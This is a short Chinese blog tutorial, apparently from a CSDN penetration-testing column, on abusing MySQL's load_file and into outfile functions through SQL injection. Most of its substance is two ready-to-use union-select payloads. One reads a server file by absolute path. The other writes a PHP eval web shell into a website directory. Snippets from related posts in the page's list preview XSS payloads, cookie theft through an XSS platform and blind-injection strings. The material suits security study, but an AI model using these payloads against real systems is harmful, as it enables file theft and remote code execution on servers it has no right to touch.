MySQL读写函数

原创于 2021-01-05 22:52:59 发布 · 402 阅读

0 ·

CC 4.0 BY-SA版权

文章标签：

#网络安全 #渗透测试 #SQL注入 #mysql注入 #读写函数

漏洞利用专栏收录该内容

26 篇文章

订阅专栏

本文介绍如何利用SQL注入漏洞进行文件读取与写入操作。通过load_file函数读取远程文件，需要具备文件的绝对路径并结合联合查询使用。intooutfile函数则用于写入文件，要求具备root权限及特定配置。文章详细解释了不同场景下的具体应用。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

读写函数

可以写Linux的一个/
可以写Windows的\\
可以写成16进制 (防止魔术引号对查询结果的影响)
可以使用url编码（防止魔术引号对查询结果的影响）
路径引用可以使用单引号（‘）或者双引号（“）

读取函数 load_file

条件：
知道文件的绝对路径

配合着联合查询进行使用

id=\-13 union select 1，load\_file(‘c:/inetpub/wwwroot/8006/index.php’)，3，4，5，6，7，8，9，10

写入函数 into outfile

条件：

拥有root权限
知道网站绝对路径
拥有写入的权限，更改文件配置secure_file_priv
单引号不会被转义，否则无法进行写入

and 1=2 union select 1,"<?php @eval($\_POST\['cracer'\]);?>",3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 into outfile 'C:/Inetpub/wwwroot/mysql\-sql/cc.php'

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

丶ershiyi

关注关注

1
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

参与评论您还未登录，请先登录后发表或查看评论

博客

渗透测试之信息收集

12-11

1247

目录信息收集资产收集寻找真实ip端口扫描旁站C段子域名探测搜索引擎找资产指纹识别资产管理信息收集信息收集对于渗透测试前期来说是非常重要的，因为只有我们掌握了目标网站或目标主机足够多的信息之后，我们才能更好地对其进行漏洞检测。正所谓，知己知彼百战百胜！信息收集的方式可以分为两种：主动和被动。主动信息收集：通过直接访问、扫描网站，这种流量将流经网站被动信息收集：利用第三方的服务对目标进行访问了解，比例：Google搜索、Shodan搜索等资产收集寻找真实ip 端口扫描旁站C段子域名探

博客

XSS详解

01-20

845

目录XSS简介XSS漏洞分类XSS漏洞攻击过程XSS漏洞危害XSS漏洞的挖掘XSS利用方式XSS过滤绕过XSS防御方式XSS工具手工挖掘工具自动化工具 XSS简介跨站脚本攻击—XSS（Cross Site Script），是指攻击者通过在Web页面中写入恶意脚本，造成用户在浏览页面时，控制用户浏览器进行操作的攻击方式，该漏洞发生在用户端，在渲染过程中发生了不在预期过程中的JavaScript代码执行。假设，在一个服务端上，有一处功能使用了这段代码，他的功能是将用户输入的内容输出到页面上，很常见的一个功能。

博客

XSS漏洞攻击过程

01-20

820

目录反射型XSS漏洞存储型XSS漏洞XSS总结反射型XSS漏洞 Alice经常浏览某个网站，此网站为Bob所拥有。Bob的站点需要Alice使用用户名/密码进行登录，并存储了Alice敏感信息(比如银行帐户信息)。 Tom 发现 Bob的站点存在反射性的XSS漏洞 Tom 利用Bob网站的反射型XSS漏洞编写了一个exp，做成链接的形式，并利用各种手段诱使Alice点击 Alice在登录到Bob的站点后，浏览了 Tom 提供的恶意链接嵌入到恶意链接中的恶意脚本在Alice的浏览器中执行。此脚本盗窃敏感

博客

XSS漏洞分类

01-20

738

目录反射型XSS储存型XSS反射型XSS与存储型XSS的区别DOM XSS可能触发DOM型xss的属性DOM型例子Blind XSSXSS总结反射型XSS 反射型XSS是比较常见和广泛的一类，举例来说，当一个网站的代码中包含类似下面的语句：<?php echo "<p>hello, $_GET['user']</p>";?> ，那么在访问时设置 /?user=</p><script>alert("hack")</script><

博客

XSS漏洞挖掘

01-20

715

目录黑盒测试白盒测试(代码审计)XSS的攻击载荷XSS可以插在哪里tipsXSS总结黑盒测试尽可能找到一切用户可控并且能够输出在页面代码中的地方，比如下面这些： URL的每一个参数 URL本身表单搜索框常见业务场景重灾区：评论区、留言区、个人信息、订单信息等针对型：站内信、网页即时通讯、私信、意见反馈存在风险：搜索框、当前目录、图片属性等白盒测试(代码审计) 关于XSS的代码审计主要就是从接收参数的地方和一些关键词入手。 PHP中常见的接收参数的方式有$_GET、$_POST、$_

博客

XSS利用方式

01-20

607

目录xss平台利用xss平台地址创建过程页面操作xss直接弹出cookieXSS总结 xss平台利用 xss平台地址 xss.fbisb.com 这个平台上有众多的xss代码创建过程点击的项目进行创建 ![[Pasted image 20210109141006.png]] 进入项目创建的构造框，我们进行项目的描述 ![[Pasted image 20210109141019.png]] 配置代码勾选默认模块与keepsession ![[Pasted image 20210109141102.png

博客

XSS过滤绕过

01-20

1733

目录过滤测试示例输入在script标签中非常规的事件监听HREF内容可控变换JavaScript变换Vbscript变换输入在属性里JSONSVG标签浏览器bug常见标签利用link远程包含js文件javascript伪协议属性payload常用的payload各种alert伪协议Chrome XSS auditor bypass长度限制jquery sourceMappingURL图片名过期的payloadcssmarkdowniframeformmeta绕过过滤空格大小写混淆双写绕过字符拼接编码绕过编码

博客

XSS防御方式

01-20

848

博客

MYSQL报错注入

01-08

3753

目录审计思路报错语句报错函数查询表floor报错函数讲解报错原理语句xpath语法报错函数讲解语句整数溢出报错exppowcot列名重复报错name_constjoin using几何函数报错不存在函数报错审计思路代码中带入查询的参数没有经过任何过滤并产生报错，具有报错信息提示，就可以用报错查询。常用报错检测符号：’ \ ; %00 ) ( # " 报错函数通常尤其最长报错输出的限制，面对这种情况，可以进行分割输出。特殊函数的特殊参数进运行一个字段、一行数据的返回，使用group_c

博客

MYSQL注入详解

01-08

727

目录注入简介注入类型联合注入报错注入盲注攻击次数二次注入约束攻击堆叠注入绕过魔术引号读写函数注入函数注入符号注入语句待补充内容注入简介目前的web大多是前后端分离，在固定前端页面上，通过不同参数去调用数据中的内容，如果这个过程中我们拼接了恶意语句并且没有被过滤掉，那么数据库很有可能会执行我们的恶意语句，从而导致攻击者可以通过拼接恶意语句来达到操作数据库，获得数据库的敏感信息，产生极大的危害常见例子 http://127.0.0.1/news.php?id=1 select * from news wh

博客

MYSQL注入语句

01-08

480

常用词汇 information_schema information_schema.schemata 查库名 [[注入函数#系统信息函数]] information_schema.tables 查表名 table_schema 指定表的数据库 table_name 表名 column_name 列名变量形式 table_schema=database()，[[hex编码]]，[[char()]] 不用单引号： select ‘root’(英文形式的单引号) select ch

博客

MYSQL注入函数

01-08

566

系统信息函数函数说明 USER() 获取当前操作句柄的用户名，同SESSION_USER()、CURRENT_USER()，有时也用SYSTEM_USER()。 DATABASE() 获取当前选择的数据库名，同SCHEMA()。 VERSION() 获取当前版本信息。常见全局变量变量说明 @@VERSION 返回版本信息 @@HOSTNAME 返回安装的计算机名称 @@GLOBAL.VERSION 同@@VERSION @@BASEDIR 返

博客

MYSQL注入符号

01-08

488

注释符单行注释单行注释单行注释多行(内联)注释 # -- x //x为任意字符 ;%00 /*任意内容*/ # 单行注释,实际渗透中最好用之前用url编码下,效果会更好,编码后的值为 %23 -- - 注意中间的空格 -- +(空格) `` 在bypass一些比较老的waf可能还会有些用 /**/ 多行注释 /*!*/ 内联注释 /*!50000 */ mysql 5通用,带版本内联注释常用运算符运算符说明运算符说明 && 与，同and。

博客

MySQL魔术引号绕过

01-08

1299

目录绕过魔术引号简介绕过绕过魔术引号简介现在的WEB程序基本都有对SQL注入的全局过滤，运维人员配置PHP环境是一般会开启魔术引号GPC，即magic_quotes_gpc=On的情况下，如果输入的数据有单引号（’）、双引号（”）、反斜线（\）与 NUL（NULL 字符）等字符都会被加上反斜线进行转义处理。不过GPC在PHP5.4版本后就取消了，所以现在一般都用addslashes()函数来代替GPC进行过滤处理。目前用PHP开发的应用一般是MVC的框架模式进行开发，对GET、POST和COOKIE等

博客

MySQL盲注

01-08

806

这里写目录标题布尔盲注时间盲注sleep函数benchmark函数笛卡尔积函数get_lock盲注正则DOS RLIKE注入dnslog盲注后续待补充布尔盲注盲注一般先看长度 id=4 and length(user())=14 布尔盲注的方法 substr，substring，mid，left，right截取单个字符 id=4 and substr((select user()),1,1)=0x72 id=4 and left((select user()),1)=0x72 用ascii()，or

博客

MYSQL联合注入

01-08

549

目录简介特定变量查询步骤Mysql版本<5.0Mysql版本>=5.0注入语句简介联合注入是使用了union select联合查询，通常用来拼接在where后面，联合注入的优势是自带多个显位，可以很快爆出数据，缺点是只能用在select最后处，后面如果还有sql语句就必须注释掉。而且必须用到union和select，很容易被拦截特定变量 1\. SCHEMATA表：提供了当前mysql实例中所有数据库的信息。 2\. TABLES 表：提供了关于数据库中的表的信息。 3\. C

博客

MYSQL的二次注入和约束攻击

01-08

450

目录二次注入约束攻击二次注入简介在第一次进行数据库插入数据的时候，过滤不严格，在写入数据库的时候还是保留了原来的数据，但是数据本身还是恶意数据。在将数据存入到了数据库中之后，开发者就认为数据是可信的。在下一次进行需要进行查询的时候，直接从数据库中取出了脏数据，没有进行进一步的检验和处理，这样就会造成SQL的二次注入。比如在第一次插入数据的时候，数据中带有单引号，直接插入到了数据库中；然后在下一次使用中在拼凑的过程中，就形成了二次注入。例子 select * from users where user

博客

sqlmap的使用详解

01-07

518

参考： sqlmap 详解 Sqlmap的使用详解

博客

MySQL堆叠注入

01-05

419

目录堆叠注入简介对照表格语句堆叠注入简介堆叠注入在mysql上不常见，必须要用到[[mysqli_multi_query()]]，可以用分号分割来执行多个语句，堆叠注入非常危险，通常sql注入有诸多限制，比如只能查不能增删改，不能更改数据库设置，而堆叠注入相当于获取了数据库密码进行直连，直接操作数据库对照表格 PHP连接MySQL数据库有三种方式（MySQL、Mysqli、PDO），同时官方对三者也做了列表性比较： Mysqli PDO MySQL 引入的PHP版本 5.0 5.0

博客

电脑常用快捷键

01-01

5060